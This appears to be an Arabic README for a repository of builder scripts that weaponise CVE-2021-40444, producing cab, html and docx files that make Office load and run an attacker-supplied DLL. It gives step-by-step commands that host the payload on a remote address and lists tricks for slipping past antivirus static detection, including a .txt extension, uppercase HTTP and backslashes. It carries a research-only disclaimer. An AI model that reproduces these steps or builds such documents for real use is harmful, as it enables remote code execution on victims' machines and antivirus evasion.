
يحتوي هذا المستودع على أدوات بناء لملفات cab وhtml وdocx لاستغلال CVE-2021-40444.
CVE-2021-40444 builders
يحتوي هذا المستودع على بناة لملف cab وملف html وملف docx لاستغلال CVE-2021-40444. هذا المستودع مخصص لأغراض الاختبار والبحث والتعليم فقط. أنت مسؤول عن كيفية استخدام الكود المقدم في هذا المستودع.
تم تطوير الكود عن طريق تحليل عينات البرامج الضارة الموجودة في البرية والتي تم مشاركتها من قبل باحثين أمنيين مختلفين.
بناة هذا الثغرة الأمنية متاحة بالفعل للعامة. الغرض من هذا المستودع هو التحقق من مدى فعالية تجاوز الكشف الثابت من قبل بائعي مكافحة الفيروسات المختلفين لملفات docx، في وقت كتابة هذا التقرير.
يمكن تشويش كود JS بسهولة باستخدام أدوات عبر الإنترنت أو يدويًا. لكن ملف docx يحتوي على ملف واحد فقط وهو document.xml.rels، والذي يمكن بناء التوقيعات عليه. ما يمكننا العبث به لتجنب الكشف الثابت لمعظم برامج مكافحة الفيروسات.
cabrc.exe هو ملف exe من Microsoft مضمن في Internet Explorer Administration Kit ويمكن تنزيله من https://docs.microsoft.com/en-us/internet-explorer/ie11-ieak/ieak-information-and-downloads وبعد التثبيت ستجد هذا الملف exe في "C:\Program Files (x86)\Windows IEAK 11"
هناك 3 بناة.
يعمل الكود مع Python 2.7
أولاً، انتقل إلى مجلد CVE-2021-40444 وضع ملف dll الخاص بك هناك وأعد تسميته إلى IEcache.inf (أو يمكنك استخدام ملف dll الخاص بالآلة الحاسبة الموجود بالفعل).
ثم انتقل إلى مجلد المصدر وأنشئ ملف cab
c:\cve-2021-40444\sources\python generate_cab.py
ارفع ملف cab الخاص بك، واستخدم عنوان URL لملف cab لإنشاء ملف html
c:\cve-2021-40444\sources\python generate_html.py http://192.168.1.12/new/winupdate.cab tests.txt (ملاحظة: بدلاً من استخدام امتداد html، إذا استخدمنا .txt فإن الاستغلال لا يزال يعمل، لكنه يتجاوز برنامج مكافحة الفيروسات)
الآن أخيرًا، ارفع ملف html الخاص بك وأنشئ ملف doc. استخدم HTTP (بحروف كبيرة) بدلاً من http، و "" بدلاً من "/"، لتجاوز برنامج مكافحة الفيروسات. ولا نحتاج أيضًا إلى x-usc:.
مثال: c:\cve-2021-40444\sources\python generate_doc.py HTTP:\\192.168.1.12\new\tests.txt
النتيجة أمامك.


www.aslitsecurity.com
[email protected]